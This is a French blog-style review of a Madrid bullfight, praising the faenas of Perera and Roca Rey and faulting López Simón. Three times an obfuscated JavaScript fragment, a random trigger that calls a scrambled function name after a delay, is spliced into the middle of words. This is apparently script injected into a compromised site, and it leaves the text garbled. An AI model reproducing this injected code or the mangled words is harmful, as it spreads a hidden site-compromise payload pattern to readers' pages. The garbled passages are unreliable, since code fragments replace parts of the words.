GRANDES FAENAS DE PERERA ET ROCA REY

La corrida de Victoriano del Rio était énorme, elle pesa en tout 3672 kilos avec en moyenne 612 kilos. En plus elle était bien armée. Evidemment, le Tendido 7 et ses partisans n’ont pas protesté. Une bonne stratégie de l’élevage pour que Las Ventas ne s’en prenne pas trop aux figuras. Surtout que les toros eurent de la mobilité et ne fléchirent pas des pattes. C’était logique, ils ne se sont pas employés par le bas lors des deux premiers tiers : fuyant d’abord, poussant ensuite mais presque toujours sans baisser la tête, ils se défendirent au combat et provoquèrent de l’émotion. Comme par ailleurs il y en eut quatre qui faisaient semblant de partir mais chargèrent à la muleta, ce qui provoqua chez l’aficionado le questionnement sur le toro manso qui cependant charge. Question que ne se posèrent point les toreros : le manso qui charge, on le torée. Pour le bon aficionado ils étaient mi mansos, mi braves, des qualificatifs qui désignent en somme le toro manso mais de combat. Dans ce cas, appartenant à un élevage qui s’illustre par sa bravoure.Il y eut deux faenas importantes, celle de Miguel Angel Perera en marquant de la distance entre lui et le toro au milieu de l’arène, en le toréant avec temple, longueur et pouvoir pour qu’il ne s’enfuie à l’issue de très bonnes séries de passes, et terminant collé au toro contre les planches ce dernier refusa de combattre. Ce fut une faena d’une grandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ande technique, de belle prestance face à une bravoure indécise. L’autre grandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ande faena fut celle de Roca Rey, qui laissa le 3ème  manso, s’enfuir vers sa querencia auprès des torils pour s’y imposer dans une faena regorgeant de courage, d’hardiesse, de longues passes, très profondes. Eblouissant : comment le courage authentique et le côté majestueux et juvénile de ce torero nous emportent. Cette année, à Madrid, on a récompensé avec une oreille des faenas qui méritaient les deux. Celles de López Simón eurent de bons passages. Avec des passes circulaires à son premier et toréant de la droite à genoux, au centre de la piste, à son second. Mais toutes deux déclinèrent lorsque les toros eurent moins de gaz. Dans cette situation, le torero madrilène ne trouva pas de solutions. On peut en conclure, que malgré quelques étincelles, il a échoué. Soulignons aussi un bon quite au 4 èmede Perera avec chicuelina, altanera, caleserina, gaonera et revolera. Et aussi une magistrale et courageuse pique de Tito Sandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andoval. Les gens sont sortis contents des arènes, on imagine que ce ne fut pas le cas du Tendido 7.

Les commentaires sont fermés.